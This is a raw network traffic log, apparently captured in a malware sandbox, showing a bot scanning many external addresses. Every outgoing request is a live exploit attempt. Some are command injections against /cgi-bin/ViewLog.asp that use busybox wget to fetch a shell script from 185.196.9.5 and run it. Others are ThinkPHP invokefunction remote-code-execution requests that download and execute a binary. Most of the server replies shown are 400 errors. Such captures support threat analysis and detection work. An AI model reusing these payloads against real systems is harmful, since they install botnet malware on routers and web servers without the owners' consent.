Feb 25, 2024 19:03:59.973647118 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:04.581608057 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:13.797698021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:32.229450941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:09.092941046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
582	192.168.2.15	47952	94.187.99.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.992249966 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
583	192.168.2.15	43726	31.200.107.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.004873991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
584	192.168.2.15	52314	31.136.83.157	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.736335039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:59.973753929 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.117697954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:18.149445057 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469217062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620800018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
585	192.168.2.15	59208	95.112.60.16	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.744005919 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:00.997802019 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:01.192770958 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
586	192.168.2.15	33750	95.236.84.195	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.746056080 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
587	192.168.2.15	54814	95.95.138.18	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.754621983 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:56.959970951 CET	404	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:56 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
588	192.168.2.15	49648	94.121.153.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.769856930 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
589	192.168.2.15	51592	94.122.219.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.775314093 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
590	192.168.2.15	59866	94.121.120.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.775600910 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
591	192.168.2.15	45756	95.209.163.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.802997112 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:57.061969042 CET	337	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 Date: Sun, 25 Feb 2024 18:03:56 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
592	192.168.2.15	38078	94.110.37.68	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.805243015 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
593	192.168.2.15	34400	95.59.200.232	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.809772968 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:57.071520090 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:03:57.071939945 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
594	192.168.2.15	45272	95.216.5.51	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:56.942156076 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:57.138331890 CET	504	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:57 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 310 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 61 30 31 3a 34 66 39 3a 32 61 3a 35 36 37 3a 3a 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 2a01:4f9:2a:567::2 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
595	192.168.2.15	59302	94.122.239.36	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:57.215389967 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
596	192.168.2.15	33274	31.200.112.92	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:57.219305992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
597	192.168.2.15	46008	94.123.120.80	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:57.221110106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
598	192.168.2.15	39634	95.90.131.87	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:57.968741894 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:58.170952082 CET	503	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:58 GMT Server: Apache/2.4.38 (Debian) Content-Length: 309 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6d 6f 7a 61 72 74 2e 63 72 79 7a 7a 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at mozart.cryzze.net Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
599	192.168.2.15	59326	95.214.234.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:57.971060991 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
